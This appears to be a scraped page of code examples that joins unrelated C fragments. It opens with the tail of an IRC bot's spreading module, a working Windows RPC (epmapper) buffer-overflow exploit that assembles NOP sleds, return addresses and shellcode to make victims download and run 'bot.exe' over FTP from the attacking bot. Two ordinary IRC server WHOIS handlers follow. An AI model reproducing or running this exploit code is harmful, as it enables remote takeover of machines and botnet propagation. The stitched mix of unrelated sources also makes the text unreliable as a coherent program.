			pTemp=szReqBuf+sizeof(request1)-1; // Fill the request with the right sizes
			*(unsigned long*)(pTemp)		= *(unsigned long*)(pTemp)		+ iSCSize / 2;
			*(unsigned long*)(pTemp+8)		= *(unsigned long*)(pTemp+8)	+ iSCSize / 2; pTemp=szReqBuf;
			*(unsigned long*)(pTemp+8)		= *(unsigned long*)(pTemp+8)	+ iSCSize - 12;
			*(unsigned long*)(pTemp+16)		= *(unsigned long*)(pTemp+16)	+ iSCSize - 12;
			*(unsigned long*)(pTemp+128)	= *(unsigned long*)(pTemp+128)	+ iSCSize - 12;
			*(unsigned long*)(pTemp+132)	= *(unsigned long*)(pTemp+132)	+ iSCSize - 12;
			*(unsigned long*)(pTemp+180)	= *(unsigned long*)(pTemp+180)	+ iSCSize - 12;
			*(unsigned long*)(pTemp+184)	= *(unsigned long*)(pTemp+184)	+ iSCSize - 12;
			*(unsigned long*)(pTemp+208)	= *(unsigned long*)(pTemp+208)	+ iSCSize - 12;
			*(unsigned long*)(pTemp+396)	= *(unsigned long*)(pTemp+396)	+ iSCSize - 12;
			
			// Connect to the server
			if(!m_sSocket.Connect(m_sSocket.m_szHost, m_sSocket.m_sPort)) // Connect failed, exit
				return false;
			// Send the bind string
			if(!m_sSocket.Write(bindstr, sizeof(bindstr)-1)) { m_sSocket.Disconnect(); return false; }
			// Read reply
			// (the bind reply is not inspected in this branch)
			m_sSocket.RecvTO(szRecvBuf, sizeof(szRecvBuf), 5000);
			// Send the evil request
			if(!m_sSocket.Write(szReqBuf, iReqSize)) { m_sSocket.Disconnect(); return false; }
			// Read reply
			if(!m_sSocket.RecvTO(szRecvBuf, sizeof(szRecvBuf), 5000)) { m_sSocket.Disconnect(); return false; }

			// Close the socket that was once funky fresh
			m_sSocket.Disconnect(); return true;
		}
		break;
	case 445:
		{
#ifdef _WIN32
			// Named-pipe transport: requires a null session to the target first.
			NETRESOURCEW nr; bool bRetVal=false;
			if(!ConnectViaNullSession(m_sSocket.m_szHost, &nr)) return bRetVal;
			else
			{	int iHostOS=FpHost(m_sSocket.m_szHost, FP_NP);
				if(iHostOS==OS_UNKNOWN) iHostOS=FpHost(m_sSocket.m_szHost, FP_SMB);
				char szPipePath[MAX_PATH];
				sprintf(szPipePath, "\\\\%s\\pipe\\epmapper", m_sSocket.m_szHost);
    
				HANDLE hFile=CreateFile(szPipePath, GENERIC_WRITE|GENERIC_READ, FILE_SHARE_READ, \
					NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
  
				if(hFile!=INVALID_HANDLE_VALUE)
				{	
					SendLocal("%s: connected to pipe \\\\%s\\pipe\\epmapper.", m_sScannerName.CStr(), m_sSocket.m_szHost);
					char szSCBuf[4096]; char szReqBuf[4096]; char szShellBuf[4096];
					int iShellSize=0, iPos=0, iSCSize=0, iReqSize=0, iNOPSize=sizeof(nops)-1;
					char *pTemp;

					CString sURL;

					// Same download URL selection as in the TCP branch.
					if(IsPrivate(g_pMainCtrl->m_cIRC.m_sLocalIp.CStr()) && !IsPrivate(m_sSocket.m_szHost))
						sURL.Format("ftp://*****:*****@%s:%d/bot.exe", g_pMainCtrl->m_cIRC.m_sLocalHost.CStr(), \
							g_pMainCtrl->m_cBot.bot_ftrans_port_ftp.iValue);
					else
						sURL.Format("ftp://*****:*****@%s:%d/bot.exe", inet_ntoa(to_in_addr(g_pMainCtrl->m_cIRC.m_lLocalAddr)), \
							g_pMainCtrl->m_cBot.bot_ftrans_port_ftp.iValue);

					iShellSize=setup_shellcode_udtf(szShellBuf, sizeof(szShellBuf), sURL.Str(), false);
					
					// Build a buffer with the shellcode
					memcpy(szSCBuf+iPos,	shellcode_start,	sizeof(shellcode_start)-1	); iPos+=sizeof(shellcode_start)-1;
					memset(szSCBuf+iPos,	'\x90',				iNOPSize					); iPos+=iNOPSize;
					memcpy(szSCBuf+iPos,	szShellBuf,			iShellSize					); iPos+=iShellSize;
					iSCSize=iPos; iPos=0;

					// Prepend NOPs as long as shellcode doesn't fit RPC packet format
					while(iSCSize%16!=12)
					{	char *szTemp=(char*)malloc(iSCSize+1); iNOPSize++;
						memcpy(szSCBuf+iPos,	shellcode_start,	sizeof(shellcode_start)-1	); iPos+=sizeof(shellcode_start)-1;
						memset(szSCBuf+iPos,	'\x90',				iNOPSize					); iPos+=iNOPSize;
						memcpy(szSCBuf+iPos,	szShellBuf,			iShellSize					); iPos+=iShellSize;
						iSCSize=iPos; iPos=0; free(szTemp); }

					// Set the return address
					if(iHostOS==OS_WINXP || iHostOS==OS_UNKNOWN)
						memcpy(szSCBuf+36, (char*)&my_offsets[1], 4);
					else
						memcpy(szSCBuf+36, (char*)&my_offsets[0], 4);

					// Build the request
					memcpy(szReqBuf+iPos,	request1,			sizeof(request1)-1			); iPos+=sizeof(request1)-1;
					memcpy(szReqBuf+iPos,	request2,			sizeof(request2)-1			); iPos+=sizeof(request2)-1;
					memcpy(szReqBuf+iPos,	szSCBuf,			iSCSize						); iPos+=iSCSize;
					memcpy(szReqBuf+iPos,	request3,			sizeof(request3)-1			); iPos+=sizeof(request3)-1;
					memcpy(szReqBuf+iPos,	request4,			sizeof(request4)-1			); iPos+=sizeof(request4)-1;
					iReqSize=iPos;

					pTemp=szReqBuf+sizeof(request1)-1; // Fill the request with the right sizes
					*(unsigned long*)(pTemp)		= *(unsigned long*)(pTemp)		+ iSCSize / 2;
					*(unsigned long*)(pTemp+8)		= *(unsigned long*)(pTemp+8)	+ iSCSize / 2; pTemp=szReqBuf;
					*(unsigned long*)(pTemp+8)		= *(unsigned long*)(pTemp+8)	+ iSCSize - 12;
					*(unsigned long*)(pTemp+16)		= *(unsigned long*)(pTemp+16)	+ iSCSize - 12;
					*(unsigned long*)(pTemp+128)	= *(unsigned long*)(pTemp+128)	+ iSCSize - 12;
					*(unsigned long*)(pTemp+132)	= *(unsigned long*)(pTemp+132)	+ iSCSize - 12;
					*(unsigned long*)(pTemp+180)	= *(unsigned long*)(pTemp+180)	+ iSCSize - 12;
					*(unsigned long*)(pTemp+184)	= *(unsigned long*)(pTemp+184)	+ iSCSize - 12;
					*(unsigned long*)(pTemp+208)	= *(unsigned long*)(pTemp+208)	+ iSCSize - 12;
					*(unsigned long*)(pTemp+396)	= *(unsigned long*)(pTemp+396)	+ iSCSize - 12;

					unsigned long lWritten; char *szInBuf=(char*)malloc(100000); memset(szInBuf, 0, 100000);
					// Send the bind string
					// (byte 2 of the reply must be 0x0C, otherwise the attempt is abandoned)
					DWORD dwRead; TransactNamedPipe(hFile, bindstr, sizeof(bindstr)-1, szInBuf, 10000, &dwRead, NULL);
					if(szInBuf[2]!=0x0C) { CloseHandle(hFile); CloseNullSession(m_sSocket.m_szHost); return bRetVal; }
					// Send the evil request
					if(!WriteFile(hFile, szReqBuf, iReqSize, &lWritten, 0)) { CloseHandle(hFile); CloseNullSession(m_sSocket.m_szHost); return bRetVal; }
					// A failed read after the write is what this branch reports as success.
					if(!ReadFile(hFile, szInBuf, 10000, &dwRead, NULL)) bRetVal=true; else bRetVal=false;
					free(szInBuf); }

				CloseHandle(hFile);
				CloseNullSession(m_sSocket.m_szHost); }
			return bRetVal;
#endif // _WIN32
		}
		break;
	default:
		return false;
		break;
	}

	return false;
}
示例#11
/*
** m_whois
**      parv[0] = sender prefix
**      parv[1] = nickname masklist
*/
int     m_whois(struct Client *cptr,
                struct Client *sptr,
                int parc,
                char *parv[])
{
  static anUser UnknownUser =
  {
    NULL,       /* next */
    NULL,       /* channel */
    NULL,       /* invited */
	NULL,		/* silence */
    NULL,       /* away */
    0,          /* last */
    1,          /* refcount */
    0,          /* joined */
    "<Unknown>"         /* server */
  };
  static char rpl_oper[] = "an IRC Operator";
  static char rpl_locop[] = "an IRC Operator - Local IRC Operator";
  static char rpl_sadmin[] = "an IRC Operator - Services Administrator";
  static char rpl_admin[] = "an IRC Operator - Server Administrator";   
  static char rpl_tadmin[] = "an IRC Operator - Technical Administrator";
  static char rpl_nadmin[] = "an IRC Operator - Network Administrator"; 
  
  Link  *lp;
  anUser        *user;
  struct Client *acptr, *a2cptr;
  aChannel *chptr;
  char  *nick, *name;
  /* char  *tmp; */
  char  *p = NULL;
  int   found, len, mlen;
  static time_t last_used=0L;
  char *nick_match=NULL, *user_match=NULL, *host_match=NULL, *server_match=NULL;
  char *name_match=NULL;
  int found_mode;
  int hits = 0;
  char *mename = me.name;

  if(sptr->user && sptr->user->vlink)
    mename = sptr->user->vlink->name;
  
  if (parc < 2)
    {
      sendto_one(sptr, form_str(ERR_NONICKNAMEGIVEN),
                 mename, parv[0]);
      return 0;
    }

  if(parc > 2)
    {
      if (hunt_server(cptr,sptr,":%s WHOIS %s :%s", 1,parc,parv) !=
          HUNTED_ISME)
        return 0;
      parv[1] = parv[2];
    }

  if(!IsAnOper(sptr) && !MyConnect(sptr)) /* pace non local requests */
    {
      if((last_used + WHOIS_WAIT) > CurrentTime)
        {
          /* Unfortunately, returning anything to a non local
           * request =might= increase sendq to be usable in a split hack
           * Sorry gang ;-( - Dianora
           */
          return 0;
        }
      else
        {
          last_used = CurrentTime;
        }
    }

  /* Multiple whois from remote hosts, can be used
   * to flood a server off. One could argue that multiple whois on
   * local server could remain. Lets think about that, for now
   * removing it totally. 
   * -Dianora 
   */

  /*  for (tmp = parv[1]; (nick = strtoken(&p, tmp, ",")); tmp = NULL) */
  nick = parv[1];
  p = strchr(parv[1],',');
  if(p)
    *p = '\0';

    {
      int       invis, member, wilds;
      found = 0;
      (void)collapse(nick);
      wilds = (nick[0]=='$' || strchr(nick, '?') || strchr(nick, '*'));
      /*
      ** We're no longer allowing remote users to generate
      ** requests with wildcards.
      */
      if (wilds && !IsAnOper(sptr))
        {
          sendto_one(sptr, form_str(ERR_NOSUCHNICK),
                     mename, parv[0], nick);
          return 0;
        }
      /*        continue; */

      /* If the nick doesn't have any wild cards in it,
       * then just pick it up from the hash table
       * - Dianora 
       */

      if(!wilds)
        {
          acptr = hash_find_client(nick,(struct Client *)NULL);
          if(!acptr)
            {
              sendto_one(sptr, form_str(ERR_NOSUCHNICK),
                         mename, parv[0], nick);

              sendto_one(sptr, form_str(RPL_ENDOFWHOIS),
                         mename, parv[0], parv[1]);
						 
              return 0;
              /*              continue; */
            }
          if(IsStealth(acptr)) { 
	    sendto_one(sptr, form_str(ERR_NOSUCHNICK), mename,
	     parv[0], nick);
	     return 0; // Add by ^Stinger^ after the idea of Soldier (:
	  } 
	  if(!IsPerson(acptr))
            {
              sendto_one(sptr, form_str(RPL_ENDOFWHOIS),
                         mename, parv[0], parv[1]);
              return 0;
            }
            /*      continue; */

          user = acptr->user ? acptr->user : &UnknownUser;
          name = (!*acptr->name) ? "?" : acptr->name;
          invis = IsInvisible(acptr);
          member = (user->channel) ? 1 : 0;

          a2cptr = find_server(user->server);
          
          sendto_one(sptr, form_str(RPL_WHOISUSER), mename,
        	    parv[0], name, acptr->username, acptr->host, acptr->info);

	  if((IsOper(sptr) || (acptr == sptr)) && WhoisExtension)
	  {
		sendto_one(sptr, form_str(RPL_WHOISREALHOST), mename,
		    parv[0], name, acptr->realhost);
	  }

          mlen = strlen(mename) + strlen(parv[0]) + 6 +
            strlen(name);
			
          *buf = '\0';			
          if (IsSsl(acptr))
          {
              sendto_one(sptr, form_str(RPL_WHOISSECURE), mename, parv[0], parv[1]);
          }

		  if(((!IsPrivate(acptr) || IsOper(sptr)) || (acptr==sptr))
		  && !IsStealth(acptr))
          for (len = 0, *buf = '\0', lp = user->channel; lp;
               lp = lp->next)
            {
              chptr = lp->value.chptr;
              if (ShowChannel(sptr, chptr))
                {
                  if (len + strlen(chptr->chname)
                      > (size_t) BUFSIZE - 4 - mlen)
                    {
                      sendto_one(sptr,
                                 ":%s %d %s %s :%s",
                                 mename,
                                 RPL_WHOISCHANNELS,
                                 parv[0], name, buf);
                      *buf = '\0';
                      len = 0;
                    }

		  found_mode = user_channel_mode(acptr, chptr);
#ifdef HIDE_OPS
		  if(is_chan_op(sptr,chptr))
#endif
		    {
		      if(found_mode & CHFL_CHANOP)
			*(buf + len++) = '@';
#ifdef HALFOPS
                     else if (found_mode & CHFL_HALFOP)
                       *(buf + len++) = '%';
#endif
		      else if (found_mode & CHFL_VOICE)
			*(buf + len++) = '+';
		    }
                  if (len)
                    *(buf + len) = '\0';
                  (void)strcpy(buf + len, chptr->chname);
                  len += strlen(chptr->chname);
                  (void)strcat(buf + len, " ");
                  len++;
                }
            }
          if (buf[0] != '\0')
            sendto_one(sptr, form_str(RPL_WHOISCHANNELS),
                       mename, parv[0], name, buf);
          if(IsAnOper(sptr) || !HideServerOnWhois)
            {
#ifdef SERVERHIDE
            if (!(IsAnOper(sptr) || acptr == sptr))
              sendto_one(sptr, form_str(RPL_WHOISSERVER),
                       mename, parv[0], name, NetworkName,
                       NetworkDesc);
            else
#endif
            if(acptr->user && acptr->user->vlink)
              sendto_one(sptr, form_str(RPL_WHOISSERVER),
                     mename, parv[0], name, user->vlink->name,
                     user->vlink->passwd);
            else
              {
                if(!IsService(acptr) || IsAnOper(sptr) || !HideServicesServer)
                sendto_one(sptr, form_str(RPL_WHOISSERVER),
                     mename, parv[0], name, user->server,
                     a2cptr?a2cptr->info:"*Not On This Net*");
              }
	    } /* if(IsAnOper(sptr) || HideServerOnWhois) */
	  if (IsIdentified(acptr))
            sendto_one(sptr, form_str(RPL_WHOISIDENTIFIED),
                       mename, parv[0], name);

          if (IsHelper(acptr))
        	sendto_one(sptr, form_str(RPL_WHOISHELPOP),
                           mename, parv[0], name);
					   
          if(IsOper(sptr) && WhoisExtension)
	  {
	    sendto_one(sptr, form_str(RPL_WHOISMODE),
		mename, parv[0], name, get_mode_string(acptr));
	  }
	  
	  if (user->away)
            sendto_one(sptr, form_str(RPL_AWAY), mename,
                       parv[0], name, user->away);
	if(!IsHideOper(acptr) || IsOper(sptr))
	  {	
	    if (IsNetAdmin(acptr))
              sendto_one(sptr, form_str(RPL_WHOISOPERATOR),   
                      mename, parv[0], name, rpl_nadmin);
	    else if (IsTechAdmin(acptr))
              sendto_one(sptr, form_str(RPL_WHOISOPERATOR),   
                      mename, parv[0], name, rpl_tadmin);						   
            else if (IsSAdmin(acptr))
              sendto_one(sptr, form_str(RPL_WHOISOPERATOR),   
                      mename, parv[0], name, rpl_sadmin);						   
            else if (IsAdmin(acptr))
              sendto_one(sptr, form_str(RPL_WHOISOPERATOR),  
                      mename, parv[0], name, rpl_admin);
            else if (IsOper(acptr))
              sendto_one(sptr, form_str(RPL_WHOISOPERATOR), 
            	mename, parv[0], name, rpl_oper);
            else if (IsLocOp(acptr))
              sendto_one(sptr, form_str(RPL_WHOISOPERATOR),
            	mename, parv[0], name, rpl_locop);
	  }
#ifdef WHOIS_NOTICE
          if ((IsOper(acptr)) && ((acptr)->umodes & UMODE_SPY) &&
              (MyConnect(sptr)) && (IsPerson(sptr)) && (acptr != sptr) && !is_silenced(sptr, acptr))
            sendto_one(acptr,
                       ":%s NOTICE %s :*** Notice -- %s (%s@%s) is doing a /whois on you.",
                       me.name, acptr->name, parv[0], sptr->username,
                       sptr->realhost);
#endif /* #ifdef WHOIS_NOTICE */


          if ((acptr->user
#ifdef SERVERHIDE
              && IsAnOper(sptr)
#endif
              && MyConnect(acptr)))
            sendto_one(sptr, form_str(RPL_WHOISIDLE),
                       mename, parv[0], name,
                       CurrentTime - user->last,
                       acptr->firsttime);
					   
          sendto_one(sptr, form_str(RPL_ENDOFWHOIS), mename, parv[0], parv[1]);
          
          return 0;
          /*      continue; */
        }

      /* wild is true so here we go */
          if(nick[0]==':') /* real name match */
            {
              name_match =  &nick[1];
              nick_match = NULL;
            }
          else
	  if(nick[0]=='$') /* server name match */
	    {
	      server_match = &nick[1];
	      nick_match = NULL;
	    }
	  else
		{
		  host_match = strchr(nick,'@');
		  if(host_match)
			{
			  if(*host_match)
				*(host_match++) = '\0';						  
			  user_match=nick;		  		  
			  if(host_match=='\0')
				host_match="*";		  			
			  if(user_match=='\0')
			  user_match="*";		  
			}
		  else
			nick_match = nick;
		}
		
	  				
      for (acptr = GlobalClientList; acptr;
           acptr = acptr->next)
        {
          if (IsServer(acptr))
            continue;
          /*
           * I'm always last :-) and acptr->next == NULL!!
           */
          if (IsMe(acptr))
            break;
          /*
           * 'Rules' established for sending a WHOIS reply:
           *
           *
           * - if wildcards are being used dont send a reply if
           *   the querier isnt any common channels and the
           *   client in question is invisible and wildcards are
           *   in use (allow exact matches only);
           *
           * - only send replies about common or public channels
           *   the target user(s) are on;
           */

/* If its an unregistered client, ignore it, it can
   be "seen" on a /trace anyway  -Dianora */

          if(!IsRegistered(acptr))
            continue;

          user = acptr->user ? acptr->user : &UnknownUser;
          name = (!*acptr->name) ? "?" : acptr->name;
		  
		  if(  (server_match && !match(server_match, user->server))
		    || (nick_match && !match(nick, name)) 
			|| (host_match && !match(host_match, acptr->realhost)
			   && !match(host_match, acptr->host))
			|| (user_match && !match(user_match, acptr->username))
			|| (name_match &&  !match(name_match, acptr->info))
			)
        	  continue;
			  
		  ++hits;
			  
          a2cptr = find_server(user->server);
          
          sendto_one(sptr, form_str(RPL_WHOISUSER), mename,
                    parv[0], name,
                    acptr->username, 
					IsOper(sptr) ? acptr->realhost : acptr->host,					 
					acptr->info);
					
          found = 1;
          mlen = strlen(mename) + strlen(parv[0]) + 6 +
            strlen(name);
          for (len = 0, *buf = '\0', lp = user->channel; lp;
               lp = lp->next)
            {
              chptr = lp->value.chptr;
              if (ShowChannel(sptr, chptr))
                {
                  if (len + strlen(chptr->chname)
                      > (size_t) BUFSIZE - 4 - mlen)
                    {
                      sendto_one(sptr,
                                 ":%s %d %s %s :%s",
                                 mename,
                                 RPL_WHOISCHANNELS,
                                 parv[0], name, buf);
                      *buf = '\0';
                      len = 0;
                    }
		  found_mode = user_channel_mode(acptr, chptr);
#ifdef HIDE_OPS
                  if(is_chan_op(sptr,chptr))
#endif
		     {
		       if (found_mode & CHFL_CHANOP)
			 *(buf + len++) = '@';
#ifdef HALFOPS
                     else if (found_mode & CHFL_HALFOP)
                        *(buf + len++) = '%';
#endif                                            
		       else if (found_mode & CHFL_VOICE)
			 *(buf + len++) = '+';
		     }
                  if (len)
                    *(buf + len) = '\0';
                  (void)strcpy(buf + len, chptr->chname);
                  len += strlen(chptr->chname);
                  (void)strcat(buf + len, " ");
                  len++;
                }
            }
          if (buf[0] != '\0')
            sendto_one(sptr, form_str(RPL_WHOISCHANNELS),
                       mename, parv[0], name, buf);
         
#ifdef SERVERHIDE
          if (!(IsAnOper(sptr) || acptr == sptr))
            sendto_one(sptr, form_str(RPL_WHOISSERVER),
                       mename, parv[0], name, NetworkName,
                       NetworkDesc);
          else    
#endif
          sendto_one(sptr, form_str(RPL_WHOISSERVER),
                     mename, parv[0], name, user->server,
                     a2cptr?a2cptr->info:"*Not On This Net*");

          if (user->away)
            sendto_one(sptr, form_str(RPL_AWAY), mename,
                       parv[0], name, user->away);



  		  if (IsNetAdmin(acptr))
                sendto_one(sptr, form_str(RPL_WHOISOPERATOR),   
                           mename, parv[0], name, rpl_nadmin);
		  else if (IsTechAdmin(acptr))
                sendto_one(sptr, form_str(RPL_WHOISOPERATOR),   
                           mename, parv[0], name, rpl_tadmin);						   
          else if (IsSAdmin(acptr))
                sendto_one(sptr, form_str(RPL_WHOISOPERATOR),   
                           mename, parv[0], name, rpl_sadmin);						   
          else if (IsAdmin(acptr))
                sendto_one(sptr, form_str(RPL_WHOISOPERATOR),  
                           mename, parv[0], name, rpl_admin);
          else if (IsAnOper(acptr))
                sendto_one(sptr, form_str(RPL_WHOISOPERATOR), 
                           mename, parv[0], name, rpl_oper);


#ifdef WHOIS_NOTICE
          if ((MyOper(acptr)) && ((acptr)->umodes & UMODE_SPY) &&
              (MyConnect(sptr)) && (IsPerson(sptr)) && (acptr != sptr))
            sendto_one(acptr,
                       ":%s NOTICE %s :*** Notice -- %s (%s@%s) is doing a /whois on you.",
                       mename, acptr->name, parv[0], sptr->username,
                       sptr->realhost);
#endif /* #ifdef WHOIS_NOTICE */

          if ((acptr->user
#ifdef SERVERHIDE
              && IsAnOper(sptr) 
#endif                 
              && MyConnect(acptr)))
            sendto_one(sptr, form_str(RPL_WHOISIDLE),
                       mename, parv[0], name,
                       CurrentTime - user->last,
                       acptr->firsttime);

		if(hits>50)
		  {
  			sendto_one(sptr,":%s NOTICE %s :Aborting /whois output as flood prevention",
				mename, sptr->name);			  
			break;
		  }
        }
		
      if (!found)	  
        sendto_one(sptr, form_str(ERR_NOSUCHNICK),
                   mename, parv[0], nick);
	  else
		sendto_one(sptr,":%s NOTICE %s :This /whois matched \2%i\2 user(s)", 
			mename, sptr->name,hits);
      /*
      if (p)
        p[-1] = ',';
        */
    }

  sendto_one(sptr, form_str(RPL_ENDOFWHOIS), mename, parv[0], parv[1]);
  
  return 0;
}
示例#12
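/*
 * WHOIS hook: sends the 319 (RPL_WHOISCHANNELS) line(s) listing the channels
 * the target nick is on.
 *
 *   hooknum - hook number; not used by this handler
 *   arg     - really a char ** with three entries:
 *               [0] nick * of the user who issued the WHOIS (sender)
 *               [1] nick * of the user being looked up (target)
 *               [2] source numeric string the reply is addressed to
 *
 * Visibility rules applied here:
 *   - nothing is listed for service clients or targets with the hide-channels
 *     mode, unless the sender is looking at itself;
 *   - secret/private channels are listed only when the sender is on them too.
 *
 * Each output line is built in a fixed 1024-byte buffer and flushed once the
 * next channel name would push it past 508 bytes.  Channel names come from
 * network state, so every write into the buffer is length-checked: an entry
 * that cannot fit is dropped rather than written past the end.
 */
void handlewhoischannels(int hooknum, void *arg) {
  channel **chans;
  char buffer[1024];
  char prefix[3];            /* at most '-' plus '@' or '+', then NUL */
  unsigned int bufpos;
  unsigned int prefixlen;
  unsigned int entries;      /* channels written into the current line */
  int written;
  sstring *name;
  unsigned long *num;
  int i;
  char **args = (char **)arg;
  nick *sender = (nick *)args[0]; /* sender nick */
  nick *target = (nick *)args[1]; /* target nick */
  char *sourcenum = args[2];      /* source numeric */

  /* do not show channels for +k service clients or IRC Operators
   * do not show channels for +n users
   * unless they whois themselves
   */
  if ((IsService(target) || IsHideChan(target)) && sender != target)
    return;

  chans = (channel **)(target->channels->content);

  buffer[0] = '\0';
  bufpos = 0;
  entries = 0;

  /* Not handling delayed joins. */
  for (i = target->channels->cursi - 1; i >= 0; i--) {
    /* Secret / Private channels: only show if the sender is on the channel as well */
    if (IsSecret(chans[i]) || IsPrivate(chans[i])) {
      if (!getnumerichandlefromchanhash(chans[i]->users, sender->numeric))
        continue;
    }

    /* The lookup yields a false value on a miss (it is tested that way for
     * the sender above), so never dereference it blindly: skip a channel whose
     * user hash does not actually contain the target. */
    num = getnumerichandlefromchanhash(chans[i]->users, target->numeric);
    if (!num)
      continue;

    /* presumably name->length is the length of name->content - verify against sstring */
    name = chans[i]->index->name;

    /* why 508? - need room for -@#channame\0 + 1 slack.
     * Flush only when the line already carries a channel, so an over-long
     * name as the first entry does not emit an empty line. */
    if (entries > 0 && bufpos + name->length > 508) {
      irc_send("%s", buffer);
      buffer[0] = '\0';
      bufpos = 0;
      entries = 0;
    }

    /*
     * 319 RPL_WHOISCHANNELS "source 319 target nick :channels"
     *                       "irc.netsplit.net 319 foobar barfoo :@#chan1 +#chan2 #chan3"
     *                       "irc.netsplit.net 319 foobar barfoo :-@#chan1 -+#chan2 -#chan3"
     */
    if (buffer[0] == '\0') {
      written = snprintf(buffer, sizeof(buffer), "%s 319 %s %s :", getmynumeric(), sourcenum, target->nick);
      /* snprintf reports the length it WANTED to write; a truncated header
       * would leave bufpos pointing outside the buffer. */
      if (written < 0 || (size_t)written >= sizeof(buffer))
        return;
      bufpos = (unsigned int)written;
    }

    /* Collect the status prefix separately so prefix and name go into the
     * buffer through one bounded, always-terminated write. */
    prefixlen = 0;
    if (IsDeaf(target))
      prefix[prefixlen++] = '-';
    if (*num & CUMODE_OP)
      prefix[prefixlen++] = '@';
    else if (*num & CUMODE_VOICE)
      prefix[prefixlen++] = '+';
    prefix[prefixlen] = '\0';

    written = snprintf(buffer + bufpos, sizeof(buffer) - bufpos, "%s%s ", prefix, name->content);
    if (written < 0 || (size_t)written >= sizeof(buffer) - bufpos) {
      /* Entry does not fit: restore the previous end of line and drop it. */
      buffer[bufpos] = '\0';
      continue;
    }
    bufpos += (unsigned int)written;
    entries++;
  }

  /* Send the last, partially filled line (a bare header is not sent). */
  if (entries > 0)
    irc_send("%s", buffer);
}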